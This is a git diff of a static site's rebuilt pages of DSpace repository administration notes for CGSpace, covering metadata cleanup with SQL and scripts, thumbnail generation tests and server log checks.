<pre><code># rm -rf /opt/eff.org/certbot/venv/bin/letsencrypt
<pre tabindex="0"><code># rm -rf /opt/eff.org/certbot/venv/bin/letsencrypt
# rm -rf /opt/ilri/dspace-statistics-api/venv
# /opt/certbot-auto
</code></pre><ul>
@ -195,8 +195,8 @@ Make sure all packages are up to date and the package manager is up to date, the
</ul>
</li>
</ul>
<pre><code>$ http 'https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030' &gt; /tmp/cgspace-104030.xml
$ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030' &gt; /tmp/dspacetest-104030.xml
<pre tabindex="0"><code>$ http &#39;https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030&#39; &gt; /tmp/cgspace-104030.xml
$ http &#39;https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030&#39; &gt; /tmp/dspacetest-104030.xml
</code></pre><ul>
<li>The DSpace Test ones actually now capture the DOI, where the CGSpace doesn&rsquo;t&hellip;</li>
<li>And the DSpace Test one doesn&rsquo;t include review status as <code>dc.description</code>, but I don&rsquo;t think that&rsquo;s an important field</li>
@ -209,11 +209,11 @@ $ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPref
</ul>
</li>
</ul>
<pre><code>dspace=# \COPY (SELECT handle, owning_collection FROM item, handle WHERE item.discoverable='f' AND item.in_archive='t' AND handle.resource_id = item.item_id) to /tmp/2019-12-04-CGSpace-private-items.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT handle, owning_collection FROM item, handle WHERE item.discoverable=&#39;f&#39; AND item.in_archive=&#39;t&#39; AND handle.resource_id = item.item_id) to /tmp/2019-12-04-CGSpace-private-items.csv WITH CSV HEADER;
COPY 48
</code></pre><h2 id="2019-12-05">2019-12-05</h2>
<ul>
<li>Give <a href="https://hdl.handle.net/10568/106045">presentation about CG Core v2</a> to the MEL Developers' Retreat in Nairobi, Kenya (via Skype)</li>
<li>Give <a href="https://hdl.handle.net/10568/106045">presentation about CG Core v2</a> to the MEL Developers&rsquo; Retreat in Nairobi, Kenya (via Skype)</li>
<li>Send some pull requests to the cg-core schema repository:
<ul>
<li><a href="https://github.com/AgriculturalSemantics/cg-core/pull/16">HTML syntax fixes</a></li>
@ -288,14 +288,14 @@ COPY 48
<li>I looked into creating RTF documents from HTML in Node.js and there is a library called <a href="https://www.npmjs.com/package/html-to-rtf">html-to-rtf</a> that works well, but doesn&rsquo;t support images</li>
<li>Export a list of all investors (<code>dc.description.sponsorship</code>) for Peter to look through and correct:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.contributor.sponsor&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-12-17-investors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.sponsor&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-12-17-investors.csv WITH CSV HEADER;
COPY 643
</code></pre><h2 id="2019-12-18">2019-12-18</h2>
<ul>
<li>Apply the investor corrections and deletions from Peter on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-12-17-investors-fix-112.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-12-17-investors-fix-112.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
</code></pre><ul>
<li>Peter asked about the &ldquo;Open Government Licence 3.0&rdquo; that is used by <a href="">some items</a>
<ul>
@ -304,13 +304,13 @@ $ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dsp
</ul>
</li>
</ul>
<pre><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open%';
<pre tabindex="0"><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%Open%&#39;;
text_value
-----------------------------
Open Government License 3.0
Open Government License 3.0
(2 rows)
dspace=# UPDATE metadatavalue SET text_value='OGL-UK-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open Government License 3.0%';
dspace=# UPDATE metadatavalue SET text_value=&#39;OGL-UK-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%Open Government License 3.0%&#39;;
UPDATE 2
</code></pre><ul>
<li>I created a pull request to add the license and merged it to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/440">#440</a>)</li>
@ -321,7 +321,7 @@ UPDATE 2
</ul>
</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c MegaIndex.ru
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c MegaIndex.ru
27320
</code></pre><ul>
<li>I see they <em>did</em> check <code>robots.txt</code> and their requests are only going to XMLUI item pages&hellip; so I guess I just leave them alone</li>
@ -338,12 +338,12 @@ UPDATE 2
<ul>
<li>I ran the <code>dspace cleanup</code> process on CGSpace (linode18) and had an error:</li>
</ul>
<pre><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(179441) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(179441) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is to delete that bitstream manually:</li>
</ul>
<pre><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (179441);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (179441);&#39;
UPDATE 1
</code></pre><ul>
<li>Adjust <a href="/cgspace-notes/cgspace-cgcorev2-migration/">CG Core v2 migrataion notes</a> to use <code>cg.review-status</code> instead of <code>cg.peer-reviewed</code>
@ -404,15 +404,15 @@ UPDATE 1
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -30,7 +30,7 @@ I tweeted the CGSpace repository link
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2020-01/" />
<meta property="article:published_time" content="2020-01-06T10:48:30+02:00" />
<meta property="article:modified_time" content="2020-03-12T12:58:21+02:00" />
<meta property="article:modified_time" content="2021-09-20T15:47:34+03:00" />
@ -56,7 +56,7 @@ I tweeted the CGSpace repository link
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -68,7 +68,7 @@ I tweeted the CGSpace repository link
"url": "https://alanorth.github.io/cgspace-notes/2020-01/",
"wordCount": "3523",
"datePublished": "2020-01-06T10:48:30+02:00",
"dateModified": "2020-03-12T12:58:21+02:00",
"dateModified": "2021-09-20T15:47:34+03:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
@ -86,12 +86,12 @@ I tweeted the CGSpace repository link
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -137,7 +137,7 @@ I tweeted the CGSpace repository link
<p class="blog-post-meta">
<time datetime="2020-01-06T10:48:30+02:00">Mon Jan 06, 2020</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -148,7 +148,7 @@ I tweeted the CGSpace repository link
<li>Last week Altmetric responded about the <a href="https://hdl.handle.net/10568/97087">item</a> that had a lower score than than its DOI
<ul>
<li>The score is now linked to the DOI</li>
<li>Another <a href="https://handle.hdl.net/10568/91278">item</a> that had the same problem in 2019 has now also linked to the score for its DOI</li>
<li>Another <a href="https://hdl.handle.net/10568/91278">item</a> that had the same problem in 2019 has now also linked to the score for its DOI</li>
<li>Another <a href="https://hdl.handle.net/10568/81236">item</a> that had the same problem in 2019 has also been fixed</li>
</ul>
</li>
@ -166,20 +166,20 @@ I tweeted the CGSpace repository link
<ul>
<li>Export a list of authors from CGSpace for Peter Ballantyne to look through and correct:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.contributor.author&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-08-authors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-08-authors.csv WITH CSV HEADER;
COPY 68790
</code></pre><ul>
<li>As I always have encoding issues with files Peter sends, I tried to convert it to some Windows encoding, but got an error:</li>
</ul>
<pre><code>$ iconv -f utf-8 -t windows-1252 /tmp/2020-01-08-authors.csv -o /tmp/2020-01-08-authors-windows.csv
<pre tabindex="0"><code>$ iconv -f utf-8 -t windows-1252 /tmp/2020-01-08-authors.csv -o /tmp/2020-01-08-authors-windows.csv
iconv: illegal input sequence at position 104779
</code></pre><ul>
<li>According to <a href="https://www.datafix.com.au/BASHing/2018-09-13.html">this trick</a> the troublesome character is on line 5227:</li>
</ul>
<pre><code>$ awk 'END {print NR&quot;: &quot;$0}' /tmp/2020-01-08-authors-windows.csv
5227: &quot;Oue
$ sed -n '5227p' /tmp/2020-01-08-authors.csv | xxd -c1
00000000: 22 &quot;
<pre tabindex="0"><code>$ awk &#39;END {print NR&#34;: &#34;$0}&#39; /tmp/2020-01-08-authors-windows.csv
5227: &#34;Oue
$ sed -n &#39;5227p&#39; /tmp/2020-01-08-authors.csv | xxd -c1
00000000: 22 &#34;
00000001: 4f O
00000002: 75 u
00000003: 65 e
@ -190,7 +190,7 @@ $ sed -n '5227p' /tmp/2020-01-08-authors.csv | xxd -c1
</code></pre><ul>
<li><del>According to the blog post linked above the troublesome character is probably the &ldquo;High Octect Preset&rdquo; (81)</del>, which vim identifies (using <code>ga</code> on the character) as:</li>
</ul>
<pre><code>&lt;e&gt; 101, Hex 65, Octal 145 &lt; ́&gt; 769, Hex 0301, Octal 1401
<pre tabindex="0"><code>&lt;e&gt; 101, Hex 65, Octal 145 &lt; ́&gt; 769, Hex 0301, Octal 1401
</code></pre><ul>
<li>If I understand the situation correctly it sounds like this means that the character is not actually encoded as UTF-8, so it&rsquo;s stored incorrectly in the database&hellip;</li>
<li>Other encodings like <code>windows-1251</code> and <code>windows-1257</code> also fail on different characters like &ldquo;ž&rdquo; and &ldquo;é&rdquo; that <em>are</em> legitimate UTF-8 characters</li>
@ -207,7 +207,7 @@ $ sed -n '5227p' /tmp/2020-01-08-authors.csv | xxd -c1
</ul>
</li>
</ul>
<pre><code>Exception: Read timed out
<pre tabindex="0"><code>Exception: Read timed out
java.net.SocketTimeoutException: Read timed out
</code></pre><ul>
<li>I am not sure how I will fix that shard&hellip;</li>
@ -225,30 +225,30 @@ java.net.SocketTimeoutException: Read timed out
</ul>
</li>
</ul>
<pre><code>In [7]: unicodedata.is_normalized('NFC', 'é')
<pre tabindex="0"><code>In [7]: unicodedata.is_normalized(&#39;NFC&#39;, &#39;&#39;)
Out[7]: False
In [8]: unicodedata.is_normalized('NFC', 'é')
In [8]: unicodedata.is_normalized(&#39;NFC&#39;, &#39;é&#39;)
Out[8]: True
</code></pre><h2 id="2020-01-15">2020-01-15</h2>
<ul>
<li>I added support for Unicode normalization to my <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a> tool in <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.0">v0.4.0</a></li>
<li>Generate ILRI and Bioversity subject lists for Elizabeth Arnaud from Bioversity:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.ilri&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 203 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-ilri-subjects.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.ilri&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 203 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-ilri-subjects.csv WITH CSV HEADER;
COPY 144
dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.bioversity&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 120 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-bioversity-subjects.csv WITH CSV HEADER;
dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.bioversity&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 120 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-bioversity-subjects.csv WITH CSV HEADER;
COPY 1325
</code></pre><ul>
<li>She will be meeting with FAO and will look over the terms to see if they can add some to AGROVOC</li>
<li>I noticed a few errors in the ILRI subjects so I fixed them locally and on CGSpace (linode18) using my <code>fix-metadata.py</code> script:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2020-01-15-fix-8-ilri-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-01-15-fix-8-ilri-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.subject.ilri -m 203 -t correct -d
</code></pre><h2 id="2020-01-16">2020-01-16</h2>
<ul>
<li>Extract a list of CIAT subjects from CGSpace for Elizabeth Arnaud from Bioversity:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.ciat&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 122 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-16-ciat-subjects.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.ciat&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 122 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-16-ciat-subjects.csv WITH CSV HEADER;
COPY 35
</code></pre><ul>
<li>Start examining the 175 IITA records that Bosede originally sent in October, 2019 (201907.xls)
@ -301,7 +301,7 @@ COPY 35
<ul>
<li>I tried to create a MaxMind account so I can download the GeoLite2-City database with a license key, but their server refuses to accept me:</li>
</ul>
<pre><code>Sorry, we were not able to create your account. Please ensure that you are using an email that is not disposable, and that you are not connecting via a proxy or VPN.
<pre tabindex="0"><code>Sorry, we were not able to create your account. Please ensure that you are using an email that is not disposable, and that you are not connecting via a proxy or VPN.
</code></pre><ul>
<li>They started <a href="https://blog.maxmind.com/2019/12/18/significant-changes-to-accessing-and-using-geolite2-databases/">limiting public access to the database in December, 2019 due to GDPR and CCPA</a>
<ul>
@ -315,15 +315,15 @@ COPY 35
</ul>
</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2020-01-08-fix-2302-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-01-08-fix-2302-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct -d
</code></pre><ul>
<li>Then I decided to export them again (with two author columns) so I can perform the new Unicode normalization mode I added to <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a>:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.contributor.author&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-authors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-authors.csv WITH CSV HEADER;
COPY 67314
dspace=# \q
$ csv-metadata-quality -i /tmp/2020-01-22-authors.csv -o /tmp/authors-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],dc.contributor.author'
$ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
$ csv-metadata-quality -i /tmp/2020-01-22-authors.csv -o /tmp/authors-normalized.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],dc.contributor.author&#39;
$ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct
</code></pre><ul>
<li>Peter asked me to send him a list of affiliations to correct
<ul>
@ -331,19 +331,19 @@ $ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -
</ul>
</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.contributor.affiliation&quot;, text_value as &quot;correct&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, text_value as &#34;correct&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
COPY 6170
dspace=# \q
$ csv-metadata-quality -i /tmp/2020-01-22-affiliations.csv -o /tmp/affiliations-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
$ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -n
$ csv-metadata-quality -i /tmp/2020-01-22-affiliations.csv -o /tmp/affiliations-normalized.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],cg.contributor.affiliation&#39;
$ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -n
</code></pre><ul>
<li>I applied the corrections on DSpace Test and CGSpace, and then scheduled a full Discovery reindex for later tonight:</li>
</ul>
<pre><code>$ sleep 4h &amp;&amp; time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ sleep 4h &amp;&amp; time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Then I generated a new list for Peter:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.contributor.affiliation&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
COPY 6162
</code></pre><ul>
<li>Abenet said she noticed that she gets different results on AReS and Atmire Listing and Reports, for example with author &ldquo;Hung, Nguyen&rdquo;
@ -352,8 +352,8 @@ COPY 6162
</ul>
</li>
</ul>
<pre><code>$ in2csv AReS-1-801dd394-54b5-436c-ad09-4f2e25f7e62e.xlsx | sed -E 's/10568 ([0-9]+)/10568\/\1/' | csvcut -c Handle | grep -v Handle | sort -u &gt; hung-nguyen-ares-handles.txt
$ grep -oE '10568\/[0-9]+' hung-nguyen-atmire.txt | sort -u &gt; hung-nguyen-atmire-handles.txt
<pre tabindex="0"><code>$ in2csv AReS-1-801dd394-54b5-436c-ad09-4f2e25f7e62e.xlsx | sed -E &#39;s/10568 ([0-9]+)/10568\/\1/&#39; | csvcut -c Handle | grep -v Handle | sort -u &gt; hung-nguyen-ares-handles.txt
$ grep -oE &#39;10568\/[0-9]+&#39; hung-nguyen-atmire.txt | sort -u &gt; hung-nguyen-atmire-handles.txt
$ wc -l hung-nguyen-a*handles.txt
46 hung-nguyen-ares-handles.txt
56 hung-nguyen-atmire-handles.txt
@ -374,7 +374,7 @@ $ wc -l hung-nguyen-a*handles.txt
</ul>
</li>
</ul>
<pre><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;23/Jan/2020:0[12345678]&quot; | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2020:0[12345678]&#34; | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>The top two hosts according to the amount of data transferred are:
<ul>
@ -388,12 +388,12 @@ $ wc -l hung-nguyen-a*handles.txt
<li>They are apparently using this Drupal module to generate the thumbnails: <code>sites/all/modules/contrib/pdf_to_imagefield</code></li>
<li>I see some excellent suggestions in this <a href="https://www.imagemagick.org/discourse-server/viewtopic.php?t=21589">ImageMagick thread from 2012</a> that lead me to some nice thumbnails (default PDF density is 72, so supersample to 4X and then resize back to 25%) as well as <a href="https://duncanlock.net/blog/2013/11/18/how-to-create-thumbnails-for-pdfs-with-imagemagick-on-linux/">this blog post</a>:</li>
</ul>
<pre><code>$ convert -density 288 -filter lagrange -thumbnail 25% -background white -alpha remove -sampling-factor 1:1 -colorspace sRGB 10568-97925.pdf\[0\] 10568-97925.jpg
<pre tabindex="0"><code>$ convert -density 288 -filter lagrange -thumbnail 25% -background white -alpha remove -sampling-factor 1:1 -colorspace sRGB 10568-97925.pdf\[0\] 10568-97925.jpg
</code></pre><ul>
<li>Here I&rsquo;m also explicitly setting the background to white and removing any alpha layers, but I could probably also just keep using <code>-flatten</code> like DSpace already does</li>
<li>I did some tests with a modified version of above that uses uses <code>-flatten</code> and drops the sampling-factor and colorspace, but bumps up the image size to 600px (default on CGSpace is currently 300):</li>
</ul>
<pre><code>$ convert -density 288 -filter lagrange -resize 25% -flatten 10568-97925.pdf\[0\] 10568-97925-d288-lagrange.pdf.jpg
<pre tabindex="0"><code>$ convert -density 288 -filter lagrange -resize 25% -flatten 10568-97925.pdf\[0\] 10568-97925-d288-lagrange.pdf.jpg
$ convert -flatten 10568-97925.pdf\[0\] 10568-97925.pdf.jpg
$ convert -thumbnail x600 10568-97925-d288-lagrange.pdf.jpg 10568-97925-d288-lagrange-thumbnail.pdf.jpg
$ convert -thumbnail x600 10568-97925.pdf.jpg 10568-97925-thumbnail.pdf.jpg
@ -404,9 +404,9 @@ $ convert -thumbnail x600 10568-97925.pdf.jpg 10568-97925-thumbnail.pdf.jpg
<li>The file size is about double the old ones, but the quality is very good and the file size is nowhere near ilri.org&rsquo;s 400KiB PNG!</li>
<li>Peter sent me the corrections and deletions for affiliations last night so I imported them into OpenRefine to work around the normal UTF-8 issue, ran them through csv-metadata-quality to make sure all Unicode values were normalized (NFC), then applied them on DSpace Test and CGSpace:</li>
</ul>
<pre><code>$ csv-metadata-quality -i ~/Downloads/2020-01-22-fix-1113-affiliations.csv -o /tmp/2020-01-22-fix-1113-affiliations.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
$ ./fix-metadata-values.py -i /tmp/2020-01-22-fix-1113-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct
$ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
<pre tabindex="0"><code>$ csv-metadata-quality -i ~/Downloads/2020-01-22-fix-1113-affiliations.csv -o /tmp/2020-01-22-fix-1113-affiliations.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],cg.contributor.affiliation&#39;
$ ./fix-metadata-values.py -i /tmp/2020-01-22-fix-1113-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct
$ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
</code></pre><h2 id="2020-01-26">2020-01-26</h2>
<ul>
<li>Add &ldquo;Gender&rdquo; to controlled vocabulary for CRPs (<a href="https://github.com/ilri/DSpace/pull/442">#442</a>)</li>
@ -422,13 +422,13 @@ $ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db
</ul>
</li>
</ul>
<pre><code>$ convert -density 288 10568-97925.pdf\[0\] -density 72 -filter lagrange -flatten 10568-97925-density.jpg
<pre tabindex="0"><code>$ convert -density 288 10568-97925.pdf\[0\] -density 72 -filter lagrange -flatten 10568-97925-density.jpg
</code></pre><ul>
<li>One thing worth mentioning was this syntax for extracting bits from JSON in bash using <code>jq</code>:</li>
</ul>
<pre><code>$ RESPONSE=$(curl -s 'https://dspacetest.cgiar.org/rest/handle/10568/103447?expand=bitstreams')
$ echo $RESPONSE | jq '.bitstreams[] | select(.bundleName==&quot;ORIGINAL&quot;) | .retrieveLink'
&quot;/bitstreams/172559/retrieve&quot;
<pre tabindex="0"><code>$ RESPONSE=$(curl -s &#39;https://dspacetest.cgiar.org/rest/handle/10568/103447?expand=bitstreams&#39;)
$ echo $RESPONSE | jq &#39;.bitstreams[] | select(.bundleName==&#34;ORIGINAL&#34;) | .retrieveLink&#39;
&#34;/bitstreams/172559/retrieve&#34;
</code></pre><h2 id="2020-01-27">2020-01-27</h2>
<ul>
<li>Bizu has been having problems when she logs into CGSpace, she can&rsquo;t see the community list on the front page
@ -438,8 +438,8 @@ $ echo $RESPONSE | jq '.bitstreams[] | select(.bundleName==&quot;ORIGINAL&quot;)
</ul>
</li>
</ul>
<pre><code>2020-01-27 06:02:23,681 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractRecentSubmissionTransformer @ Caught SearchServiceException while retrieving recent submission for: home page
